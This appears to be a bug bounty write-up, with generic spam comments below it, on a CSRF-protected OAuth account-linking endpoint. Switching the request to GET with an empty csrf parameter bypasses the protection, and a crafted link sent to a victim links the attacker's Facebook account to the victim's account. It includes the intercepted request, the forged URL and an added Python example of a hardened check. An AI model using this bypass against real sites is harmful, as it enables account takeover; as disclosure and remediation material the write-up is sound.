
Vulnerability – Account takeover using OAuth Misconfiguration

About OAuth

OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites without giving them their passwords. This mechanism is used by companies such as Google, Facebook, Microsoft and Twitter to let users share information about their accounts with third-party applications or websites.

Generally, OAuth provides clients with “secure delegated access” to server resources on behalf of a resource owner. It specifies a process for resource owners to authorize third-party access to their server resources without sharing their credentials. Designed specifically to work with Hypertext Transfer Protocol (HTTP), OAuth essentially allows access tokens to be issued to third-party clients by an authorization server, with the approval of the resource owner. The third party then uses the access token to access the protected resources hosted by the resource server.

Case Study

As this was a private program, all illustrations of the vulnerability use example.com as the host.

The application had a registration page where a user could register a new username and password, which allowed him to log in to the application via the login page.

After successful registration, you are redirected to the profile page, where you need to fill in some more details about yourself, and you are good to go.

In the account section, you have the option to link your Facebook or LinkedIn account.

When you click on Link Facebook, you are redirected to Facebook.com, where you need to click on Authorize this app.

Click on Authorize and intercept the request. The request looks something like this:

POST /facebook/couple HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 293
Connection: close
Cookie:

action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qyf&csrf=98798asfdcasf7d98s7adf98s7df98a7sdf9

As you can see, the POST request carries a CSRF token. The token can be omitted by changing the POST request to a GET request with the csrf parameter left empty, something like this:

https://www.example.com/facebook/couple?action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qy&csrf=

Send this link to the victim. As soon as the victim visits the link, his/her account is linked to your Facebook account, and you can access it with the Login with Facebook option.
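An added example (not the application's code, which the page does not show): a server-side check for the linking endpoint that rejects the GET variant above. `weak_check` is a hypothetical reconstruction of logic that would behave as described; the function names, session layout and sample requests are assumptions.

```python
import hmac
import secrets

STATE_CHANGING = {"POST"}  # linking an identity changes account state


def weak_check(method, params, session):
    """Hypothetical reconstruction: the CSRF token is only verified on POST."""
    if method == "POST":
        return hmac.compare_digest(params.get("csrf", ""), session["csrf"])
    return True  # any other method falls through with no token check


def hardened_check(method, params, session):
    """Return (allowed, reason) for a request to the account-linking endpoint."""
    if method not in STATE_CHANGING:
        return False, "405 method not allowed"
    expected = session.get("csrf")
    supplied = params.get("csrf", "")
    if not expected or not supplied:
        return False, "403 missing CSRF token"
    if not hmac.compare_digest(supplied, expected):
        return False, "403 CSRF token mismatch"
    return True, "ok"


def demo():
    """Run constructed requests through both checks."""
    session = {"user": "victim", "csrf": secrets.token_urlsafe(32)}
    base = {"action": "couple", "access_token": "PLACEHOLDER_TOKEN"}
    requests = {
        # Link opened in the victim's browser: GET, empty csrf parameter
        "forged_get": ("GET", dict(base, csrf="")),
        # Cross-site form post with a guessed token
        "forged_post": ("POST", dict(base, csrf="guess")),
        # The application's own form, carrying the session's token
        "legit_post": ("POST", dict(base, csrf=session["csrf"])),
    }
    results = {}
    for name, (method, params) in requests.items():
        weak = weak_check(method, params, session)
        allowed, reason = hardened_check(method, params, session)
        results[name] = (weak, reason)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

In a real framework the same effect comes from registering the route for POST only and keeping the CSRF middleware enabled for it, so the token check cannot be skipped by switching methods.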

Reported: 3 March 2020
Responded: 4 March 2020
Rewarded: $300, 6 March 2020

7 replies on “Vulnerability – Account takeover using OAuth Misconfiguration”

I have learned a few excellent stuff here. Certainly price bookmarking for revisiting.
I surprise how much effort you set to create one of these excellent informative site.

If someone wishes expert view on the topic of blogging and site-building afterward I propose him/her to go to see this web site,
Keep up the nice work.

I’m not certain where you are getting your information, however good topic.
I must spend a while finding out much more or understanding more. Thanks for wonderful information I was in search of this information for my mission.

I like the helpful information you provide in your articles.
I will bookmark your weblog and check again here frequently.
I am quite sure I will learn plenty of new stuff right here!
Good luck for the next!

Like!! I blog quite often and I genuinely thank you for your information. The article has truly piqued my interest.
